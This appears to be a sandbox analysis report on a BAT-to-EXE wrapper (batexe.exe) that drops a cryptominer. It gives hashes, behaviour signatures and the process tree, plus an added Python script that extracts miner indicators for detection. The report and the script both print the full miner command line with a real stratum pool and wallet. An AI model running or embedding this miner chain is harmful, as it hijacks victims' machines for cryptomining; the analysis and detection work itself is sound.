Analysis
max time kernel: 293s
max time network: 301s
platform: windows10-2004_x64
resource: win10v2004-20231215-ja
resource tags: arch:x64, arch:x86, image:win10v2004-20231215-ja, locale:ja-jp, os:windows10-2004-x64, system, windows
submitted: 11-02-2024 17:00
Behavioral task behavioral1: sample batexe.exe, resource win10-20231215-ja
Behavioral task behavioral2: sample batexe.exe, resource win10v2004-20231215-ja
General
Target: batexe.exe
Size: 9.4MB
MD5: cdc9eacffc6d2bf43153815043064427
SHA1: d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256: 73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512: fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP: 196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
Checks computer location settings (2 TTPs, 2 IoCs)
Looks up the country code configured in the registry, likely a geofence check.
  Key value queried: \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation (process: batexe.exe)
  Key value queried: \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation (process: b2e.exe)
Executes dropped EXE (2 IoCs)
  PID 1464: b2e.exe
  PID 3224: cpuminer-sse2.exe
Loads dropped DLL (5 IoCs)
  PID 3224: cpuminer-sse2.exe (5 events)
YARA match: upx
  resource: behavioral2/memory/5104-9-0x0000000000400000-0x000000000393A000-memory.dmp (memory dump of PID 5104, batexe.exe, region 0x400000-0x393A000)
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
Suspicious use of WriteProcessMemory (8 IoCs)
  PID 5104 (batexe.exe) wrote to memory of PID 1464, procid_target 85 (3 events)
  PID 1464 (b2e.exe) wrote to memory of PID 3512, procid_target 86 (3 events)
  PID 3512 (cmd.exe) wrote to memory of PID 3224, procid_target 89 (2 events)
Processes
[1] C:\Users\Admin\AppData\Local\Temp\batexe.exe (PID 5104)
    command line: "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
  [2] C:\Users\Admin\AppData\Local\Temp\6EC7.tmp\b2e.exe (PID 1464)
      command line: "C:\Users\Admin\AppData\Local\Temp\6EC7.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\6EC7.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
      - Checks computer location settings
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\cmd.exe (PID 3512)
        command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\71D4.tmp\batchfile.bat" "
        - Suspicious use of WriteProcessMemory
      [4] C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe (PID 3224)
          command line: cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
          - Executes dropped EXE
          - Loads dropped DLL
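The process tree is the whole story of this sample: a BAT-to-EXE wrapper (batexe.exe) unpacks a second stage (b2e.exe) into a .tmp folder under %TEMP%, b2e.exe runs a batch file through cmd.exe, and the batch file starts cpuminer-sse2.exe against a stratum pool with the wallet passed in --userpass. Two details worth reading off the tree: cmd.exe's image path is SysWOW64 although its command line says system32, so the parent b2e.exe is a 32-bit process (file system redirection, consistent with the arch:x86 tag); and the --userpass password c=doge is zpool's convention for selecting the payout coin, so the username is a Dogecoin payout address. The following Python is an added example, not part of the sandbox report or of any tool it names: it rebuilds the parent chain from process-creation events and pulls pool, port, algorithm and wallet out of the miner command line. The event list is constructed from the PIDs and command lines reported above; the -O short option is cpuminer's alias for --userpass.

```python
import re
from dataclasses import dataclass
from typing import Optional


@dataclass
class Proc:
    """One process-creation event: pid, parent pid, image path, command line."""
    pid: int
    ppid: Optional[int]
    image: str
    cmdline: str


# Constructed sample input: the four processes from the report's process tree,
# with the PIDs, image paths and command lines as reported there.
SAMPLE_EVENTS = [
    Proc(5104, None, r"C:\Users\Admin\AppData\Local\Temp\batexe.exe",
         r'"C:\Users\Admin\AppData\Local\Temp\batexe.exe"'),
    Proc(1464, 5104, r"C:\Users\Admin\AppData\Local\Temp\6EC7.tmp\b2e.exe",
         r'"C:\Users\Admin\AppData\Local\Temp\6EC7.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\6EC7.tmp\b2e.exe '
         r'C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"'),
    Proc(3512, 1464, r"C:\Windows\SysWOW64\cmd.exe",
         r'C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\71D4.tmp\batchfile.bat" "'),
    Proc(3224, 3512, r"C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe",
         r"cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 "
         r"--userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3"),
]

# Pool URL: stratum+tcp:// or stratum+ssl://host:port (the cpuminer -o / --url argument).
STRATUM_RE = re.compile(r"stratum\+(?:tcp|ssl)://(?P<host>[^\s:/]+):(?P<port>\d+)", re.I)
# Credentials: --userpass=U:P or cpuminer's -O U:P short form. Pools that take a wallet
# as the username put it in U; zpool uses P as c=COIN to pick the payout coin.
USERPASS_RE = re.compile(r"(?:--userpass[= ]|-O\s+)(?P<user>[^:\s]+)(?::(?P<pw>\S+))?")
# Algorithm: -a ALGO or --algo=ALGO.
ALGO_RE = re.compile(r"(?:^|\s)(?:-a\s+|--algo[= ])(?P<algo>\S+)")
TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.I)


def extract_miner_config(cmdline: str) -> Optional[dict]:
    """Return pool host/port, wallet, payout hint and algorithm if cmdline points a
    miner at a stratum pool; None for anything else (plain paths, cmd.exe /c ...)."""
    m = STRATUM_RE.search(cmdline)
    if not m:
        return None
    cfg = {"pool_host": m.group("host"), "pool_port": int(m.group("port")),
           "wallet": None, "payout_hint": None, "algo": None}
    u = USERPASS_RE.search(cmdline)
    if u:
        cfg["wallet"] = u.group("user")
        cfg["payout_hint"] = u.group("pw")
    a = ALGO_RE.search(cmdline)
    if a:
        cfg["algo"] = a.group("algo")
    return cfg


def ancestry(procs, pid):
    """Walk pid -> ppid -> ... through the event list, child first. Stops at a
    missing parent or a cycle (PID reuse can make a sandbox tree loop)."""
    by_pid = {p.pid: p for p in procs}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid].ppid
    return chain


def find_miner_chains(procs):
    """Flag every process whose command line configures a stratum miner and describe
    how it got there: root-to-leaf image chain, whether the binary runs from %TEMP%,
    and whether a cmd.exe running a .bat sits between it and the root."""
    hits = []
    for p in procs:
        cfg = extract_miner_config(p.cmdline)
        if cfg is None:
            continue
        chain = ancestry(procs, p.pid)
        parents = chain[1:]
        hits.append({
            "pid": p.pid,
            "image": p.image,
            "chain": [c.image.rsplit("\\", 1)[-1].lower() for c in reversed(chain)],
            "runs_from_temp": bool(TEMP_RE.search(p.image)),
            "via_cmd_batch": any(c.image.lower().endswith("\\cmd.exe") and ".bat" in c.cmdline.lower()
                                 for c in parents),
            **cfg,
        })
    return hits


if __name__ == "__main__":
    for hit in find_miner_chains(SAMPLE_EVENTS):
        print(" -> ".join(hit["chain"]))
        print(f"  pool {hit['pool_host']}:{hit['pool_port']} algo {hit['algo']} "
              f"wallet {hit['wallet']} ({hit['payout_hint']})")
```

Run against the constructed events it reports one chain, batexe.exe -> b2e.exe -> cmd.exe -> cpuminer-sse2.exe, with the zpool host and port, the yespower algorithm and the wallet string; the pool host, port and wallet are the indicators to block or hunt for, and the chain shape (wrapper in %TEMP% -> cmd.exe /c a .bat in %TEMP% -> miner) is the behavioural pattern a detection rule should key on rather than the file hashes, which change with every rebuild of the wrapper.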
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 17.4MB
  MD5: 422f8002f81d0a60fe005ed49810dff9
  SHA1: e52359c01ee24077ef817a10c05f14f82ba01af4
  SHA256: 76ca221500b8d32b6c30ff03ff8f7ebd2de41eaa1fbdeebadd13dad54f3b55c8
  SHA512: 3b404430ded51ca17500f2cda3584d9e77d5c0be272c45fb7ff24ad8250e1f4b3237dbfc41fe8621b10df641ea462e2ee3c9335aaadc89635bfd3cd974237b65
Filesize: 6.8MB
  MD5: 7e306719ab1c3ad37e9fced281085f72
  SHA1: 17021bf7ed2590e63c507a196b9e91910e89943f
  SHA256: 0f2f608f9fa19607d0e26aa78f018c42d383239c777dfdb32b890971cccf25f3
  SHA512: 424dcad7b45177a1859e02c2466bfe8d749d344dff8576b8ac4d6c1d29916d5970dbc981329cfc50afce3cf0687fd36846a750663cd9b9a679bf2f05f1a66598
Filesize: 6.9MB
  MD5: 47dfc99e11dd5b6365fe0668600b82b7
  SHA1: e7b63faab201e894f2fac11adeb394acb4291790
  SHA256: 900cf6184b715c3d6283e1fb48a7547b38520b7d059a0ab93762f57013832133
  SHA512: d6deef8898a9b0023721d52190f6a9699d4db46765259ea287a0674223e8a503cbab8233c76426459c2d3d2af6dd4c1f14ebebb8d8d691a979a084fca85e22b9
Filesize: 136B
  MD5: 8ea7ac72a10251ecfb42ef4a88bd330a
  SHA1: c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
  SHA256: 65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
  SHA512: a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
Filesize: 2.0MB
  MD5: dae626b11af46c392130819340f83070
  SHA1: c8369936c56ce9d87bbfe04479a03c7071d69faf
  SHA256: 52bbc8f1efd0e82809c29ec0f95475379c4d31e371fded64ac3335924d005e06
  SHA512: cb070364194431c42640741534cc718517cf9276eddcc8968701874b32bc6a3ce2a0a39c54ba48b1d76131a37d73ae33213f487abfba478b95574490bb8f8d20
Filesize: 1.6MB
  MD5: cf8901f3ca3c3c51f95e159afba4dbd3
  SHA1: 76d8ce08d51a22cef486cd884db7ec1603571261
  SHA256: 2e05f281848a648a55f18915a773e19f88869d0b3e4c9841b5da7a2ba2d3d2d1
  SHA512: 104940827f7e7ac7695ed9886caab370b362b84cf3a8a185b94cdc5c75a90197cc89e7017d257d0888830f57a16ce65c86ee55f28b3400ff0f396c2f80e7e762
Filesize: 836KB
  MD5: aeab40ed9a8e627ea7cefc1f5cf9bf7a
  SHA1: 5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8
  SHA256: 218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9
  SHA512: c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8
Filesize: 1.2MB
  MD5: 7cf672bee2afba2dcd0c031ff985958e
  SHA1: 6b82a205db080ffdcb4a4470fce85a14413f3217
  SHA256: c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05
  SHA512: 3e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5
Filesize: 2.5MB
  MD5: 56e9fc62d257c784042d98fa553cf09d
  SHA1: 611533c8dfaa859c0cd3b51b3cb31e9f7c294f03
  SHA256: ad0ee74b6a3266083eeacb2155e5abdf3ca8cd76bf55be5b80483be7657fec25
  SHA512: 050e70999181b8d1e936d7846c3201f33496b4f49ace223206e23aec17804cdccf62794f404c1d2e1b551c07c180e307fd6268ff4b322054c543de4a96d6f522
Filesize: 2.4MB
  MD5: 84d4f366a49cf3a2d40974fbaf1ae916
  SHA1: f106aeea661e23248be8a7f603d5eaffbacfa511
  SHA256: c4132c41cf1b942ab91d9eb97f932c8f4f5b4aaa626843b68c0b3fa8f77ebc6b
  SHA512: 4ec22ef489760aa78c35ad39d0d47263993fc10cd82a01bce70e344a045767aa2ef9da819e73ef5682fe2689787c7a5c419b3e15ac871282030bfa665930888b
Filesize: 2.2MB
  MD5: fa640bc95a5c7d55f8a0c1ad1b7c99ad
  SHA1: d441a00368e324e72af9737adce3bc5946614581
  SHA256: aa1559766dca7a103b10b26e59245cbb2109e5669625849e8a9892bac7d795c5
  SHA512: b701caad77def86fffc065005d8c788d49bc0ae5dfb64a968867d9f94fe3d2e9120ae90e4af8b12dd590e753fe08dadb2f38eb46909a54aa0b13a515f51fa37c
Filesize: 606KB
  MD5: 585efec1bc1d4d916a4402c9875dff75
  SHA1: d209613666ccac9d0ddab29a3bc59aa00a0968fa
  SHA256: 2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
  SHA512: b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770